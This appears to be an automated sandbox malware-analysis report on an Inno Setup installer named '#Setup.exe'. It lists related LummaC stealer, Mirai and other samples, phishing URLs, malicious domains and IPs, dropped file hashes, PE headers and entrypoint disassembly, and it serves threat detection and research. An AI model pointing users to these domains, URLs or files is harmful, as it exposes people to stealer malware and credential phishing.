	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
locketsashayz.click	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.57.27
locketsashayz.click	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.158.190
klipvumisui.shop	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128
	@Setup.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	setup.msi	Get hash	malicious	Unknown	Browse	104.21.0.151
	https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188	Get hash	malicious	KnowBe4	Browse	104.17.25.14
	random.exe	Get hash	malicious	LummaC	Browse	104.21.64.143
	https://tepco-jp-lin;.%5Dshop/co/tepco	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857	Get hash	malicious	KnowBe4	Browse	104.18.87.62
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	UmotQ1qjLq.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	PI1EA8P74K.exe	Get hash	malicious	LummaC	Browse	172.67.148.118
	https://aiihsr.com/FloridaCU	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://flowto.it/8tooc2sec?fc=0	Get hash	malicious	Unknown	Browse	104.18.35.227
CLOUDFLARENETUS	setup.msi	Get hash	malicious	Unknown	Browse	104.21.0.151
	https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188	Get hash	malicious	KnowBe4	Browse	104.17.25.14
	random.exe	Get hash	malicious	LummaC	Browse	104.21.64.143
	https://tepco-jp-lin;.%5Dshop/co/tepco	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857	Get hash	malicious	KnowBe4	Browse	104.18.87.62
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	UmotQ1qjLq.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	PI1EA8P74K.exe	Get hash	malicious	LummaC	Browse	172.67.148.118
	https://aiihsr.com/FloridaCU	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://flowto.it/8tooc2sec?fc=0	Get hash	malicious	Unknown	Browse	104.18.35.227
NTLGB	botx.ppc.elf	Get hash	malicious	Mirai	Browse	82.31.53.184
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	62.31.100.59
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	82.37.70.27
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	82.42.160.251
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	163.164.159.5
	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	86.17.1.166
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	82.16.218.110
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	random.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 188.114.97.3 185.161.251.21
	UmotQ1qjLq.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 188.114.97.3 185.161.251.21
	PI1EA8P74K.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 188.114.97.3 185.161.251.21
	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 188.114.97.3 185.161.251.21
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.37.128 188.114.97.3 185.161.251.21
	universityform.xlsm	Get hash	malicious	Unknown	Browse	104.21.37.128 188.114.97.3 185.161.251.21
	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.37.128 188.114.97.3 185.161.251.21
	universityform.xlsm	Get hash	malicious	Unknown	Browse	104.21.37.128 188.114.97.3 185.161.251.21
	6QLvb9i.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 188.114.97.3 185.161.251.21

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_isdecmp.dll	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	@Setup.exe	Get hash	malicious	LummaC	Browse
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse
	cho_mea64.exe	Get hash	malicious	MicroClip	Browse
C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllul9kLZ:NllUG
MD5:	087D847469EB88D02E57100D76A2E8E4
SHA1:	A2B15CEC90C75870FDAE3FEFD9878DD172319474
SHA-256:	81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
SHA-512:	4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
Malicious:	false
Preview:	@...e.................................,..............@..........

C:\Users\user\AppData\Local\Temp\5f168990

Download File

Process:	C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
File Type:	PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	6447207
Entropy (8bit):	7.998441497232368
Encrypted:	true
SSDEEP:	196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
MD5:	B0CB3F07919BEB69B342ED871C6511A9
SHA1:	C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
SHA-256:	AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
SHA-512:	75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
Malicious:	false
Preview:	.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....\|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..\|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.\|3...s.9..&.\|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K\|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................\|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.\|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..\|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......

C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe

Download File

Process:	C:\Users\user\Desktop\#Setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	8767044
Entropy (8bit):	7.960152326344281
Encrypted:	false
SSDEEP:	196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
MD5:	51F99EDDD33CC04FB0F55F873B76D907
SHA1:	60CD79359912A9069674CEE3C5C5982A9B01CE82
SHA-256:	16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
SHA-512:	7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Joe Sandbox View:	Filename: installer_1.05_36.5.exe, Detection: malicious, Browse Filename: @Setup.exe, Detection: malicious, Browse Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gcyw113y.ivv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i23x0154.uye.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: installer_1.05_36.5.exe, Detection: malicious, Browse Filename: @Setup.exe, Detection: malicious, Browse Filename: MdhO83N5Fm.exe, Detection: malicious, Browse Filename: installer_1.05_36.4.exe, Detection: malicious, Browse Filename: !Setup.exe, Detection: malicious, Browse Filename: @Setup.exe, Detection: malicious, Browse Filename: Full_Setup.exe, Detection: malicious, Browse Filename: appFile.exe, Detection: malicious, Browse Filename: FloydMounts.exe, Detection: malicious, Browse Filename: cho_mea64.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	6.530011244733973
Encrypted:	false
SSDEEP:	98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
MD5:	F809F51E678B7F2E388F8C969EF902C8
SHA1:	DC1C645533E0FD1637BF455BA69A9481E7C4B83A
SHA-256:	8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
SHA-512:	C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-SC3PP.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-SC3PP.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	6.530011244733973
Encrypted:	false
SSDEEP:	98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
MD5:	F809F51E678B7F2E388F8C969EF902C8
SHA1:	DC1C645533E0FD1637BF455BA69A9481E7C4B83A
SHA-256:	8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
SHA-512:	C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	846325235
Entropy (8bit):	0.13954043794048707
Encrypted:	false
SSDEEP:
MD5:	6A8860A8150021B2D5B9BB707DE4FA37
SHA1:	FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
SHA-256:	0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
SHA-512:	899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ColorStreamLib\is-FS5QT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	846325235
Entropy (8bit):	0.13954043794048707
Encrypted:	false
SSDEEP:
MD5:	6A8860A8150021B2D5B9BB707DE4FA37
SHA1:	FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
SHA-256:	0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
SHA-512:	899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	0.48391503143429454
TrID:	Win32 Executable (generic) a (10002005/4) 97.75% Windows ActiveX control (116523/4) 1.14% Inno Setup installer (109748/4) 1.07% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	#Setup.exe
File size:	74'253'304 bytes
MD5:	87186256e55365349fa7fc41c9f1c913
SHA1:	746ca2cf44c28df9aa492affc3c9481eaee07613
SHA256:	00e55ba929dc1832e8a3c987aaa9b3ef958742200faec9530e65b42960bb454a
SHA512:	52e6d6c8994328a5288a0fecabcfe85eb5b6d4e8bab7042f6e66df157e6b7f7cd8cfc2c85b1263bebe805874f2327f24ab99c37315ea507fc9ea2708ef9bae77
SSDEEP:	24576:9tdAm9DUi/CR3wCkCiRgoG7hBaHkbEXoeG/jFt5JpoTx9ajfQW+Q2tVChKd7G:zqTytRFkFek1GQ4W+QIChK1G
TLSH:	53F7F621973132B1DB5319B97907D2CF99FCB1103320F4FF65DE360A9A529D87232A6A
File Content Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	33336d3733131317

Static PE Info

General

Entrypoint:	0x50156c
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x57051F89 [Wed Apr 6 14:39:05 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	f62b90e31eca404f228fcf7068b00f31

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	15/12/2020 22:24:20 02/12/2021 22:24:20
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	4068B1B0494EFA79F5A751DCCA8111CD
Thumbprint SHA-1:	914A09C2E02C696AF394048BCB8D95449BCD5B9E
Thumbprint SHA-256:	4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
Serial:	33000003DFFB6AE3F427ECB6A30000000003DF

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
push esi
push edi
mov eax, 004FEBF4h
call 00007F2F48AC2D32h
push FFFFFFECh
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov ebx, dword ptr [eax+00000170h]
push ebx
call 00007F2F48AC3BDDh
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
mov eax, dword ptr [00504E38h]
push ebx
call 00007F2F48AC3E32h
xor eax, eax
push ebp
push 005015E7h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007F2F48AC357Dh
call 00007F2F48BB86DCh
mov eax, dword ptr [004FE82Ch]
push eax
push 004FE890h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
call 00007F2F48B36171h
call 00007F2F48BB8730h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007F2F48BBB37Bh
